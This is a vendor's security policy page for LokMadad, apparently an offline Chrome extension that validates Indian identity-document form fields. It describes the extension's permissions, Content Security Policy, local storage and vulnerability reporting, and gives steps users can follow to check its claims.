🛡️

Security

Last Updated: January 30, 2026 • Version 1.2.0

🔐
Security by Design: LokMadad is architected with security as a core principle. By operating 100% offline, we eliminate the most common attack vectors: network interception, server breaches, and data leaks.

1. Security Architecture Overview

LokMadad employs a "security through simplicity" approach. By minimizing our attack surface, we maximize your protection.

🔒

100% Offline

No network requests means no data interception, no man-in-the-middle attacks, and no server-side vulnerabilities.

💾

Local Storage Only

All data stays in Chrome's encrypted local storage, protected by your browser's built-in security.

🚫

No External Dependencies

Zero third-party libraries, APIs, or services that could introduce vulnerabilities.

Minimal Permissions

We request only the permissions absolutely necessary for form validation.

2. Data Protection

2.1 No Data Transmission

LokMadad makes zero network requests. This is verifiable:

  • Open Chrome DevTools → Network tab while using the extension
  • You will see no requests originating from LokMadad
  • Our manifest.json contains no remote hosts in permissions

2.2 Local Storage Security

When you save profile data:

  • Data is stored using chrome.storage.local
  • Chrome encrypts this storage on disk
  • Data is isolated and accessible only to LokMadad
  • Other extensions cannot access your saved data
  • Websites cannot access extension storage

2.3 Sensitive Data Handling

🛡️
Important: Your Aadhaar, PAN, and other sensitive data is ONLY processed in memory during validation. It is never logged, cached (except in local storage if you explicitly save it), or transmitted anywhere.

3. Secure Coding Practices

Our codebase follows industry-standard security practices:

Practice Implementation
Content Security Policy Strict CSP in manifest.json prevents injection attacks
No eval() We never use eval(), new Function(), or similar dynamic code execution
Input Sanitization All user inputs are sanitized before processing to prevent XSS
No Inline Scripts All JavaScript is in separate files, no inline event handlers
Principle of Least Privilege Extension requests minimal necessary permissions

4. Extension Permissions Explained

Transparency about what we access and why:

storage

Purpose: Save your settings and optional profile data locally

Access Level: Extension-only, isolated from websites and other extensions

Risk: Minimal — data stays on your device

host_permissions: <all_urls>

Purpose: Detect and validate form fields on any website you visit

Access Level: Can read DOM elements on pages to find form fields

Risk: We only read form field attributes (name, type, value) for validation. We do NOT read page content, cookies, or any other data.

5. Content Security Policy

Our manifest.json enforces a strict Content Security Policy:

"content_security_policy": {
  "extension_pages": "script-src 'self'; object-src 'self'"
}

This policy:

  • Only allows scripts from within the extension package
  • Blocks inline JavaScript execution
  • Prevents loading external scripts
  • Mitigates XSS and code injection attacks

6. What We Don't Do

LokMadad is designed with intentional limitations for your security:

  • We don't track your browsing activity
  • We don't log form submissions
  • We don't capture screenshots or keystrokes
  • We don't inject ads or affiliate links
  • We don't sell or share any data (we have none)
  • We don't connect to any remote servers
  • We don't auto-update content from external sources

7. Verification

Don't take our word for it — you can verify our security claims:

7.1 Network Activity

  1. Install LokMadad
  2. Open Chrome DevTools (F12) → Network tab
  3. Use the extension on various websites
  4. Filter by "lokmadad" or check all requests
  5. Verify: Zero outgoing requests from the extension

7.2 Permission Audit

  1. Go to chrome://extensions
  2. Click "Details" on LokMadad
  3. Review "Site access" and "Permissions"
  4. Verify we only request minimal permissions

8. Security Updates

We are committed to maintaining a secure extension:

  • Regular code reviews for potential vulnerabilities
  • Prompt updates if security issues are discovered
  • Following Chrome's Manifest V3 security guidelines

9. Reporting Security Issues

If you discover a security vulnerability, please report it responsibly:

📧 lokmaddad@gmail.com

Please include:

  • Description of the vulnerability
  • Steps to reproduce
  • Potential impact
  • Your suggested fix (if any)

We take all security reports seriously and will respond promptly.

10. Third-Party Website Security

⚠️
Disclaimer: While LokMadad helps you fill forms securely, we cannot guarantee the security of the websites you visit. Always verify you're on legitimate websites before entering sensitive information.

LokMadad does not validate or vouch for the security of any third-party website. We recommend:

  • Checking for HTTPS (padlock icon) before entering data
  • Verifying website authenticity through official channels
  • Being cautious of phishing attempts
🔐

Security Summary: LokMadad is designed from the ground up with security in mind. By operating offline with minimal permissions and following strict coding practices, we ensure your sensitive data remains protected and under your control.

← Back to Home
Privacy Policy Terms & Conditions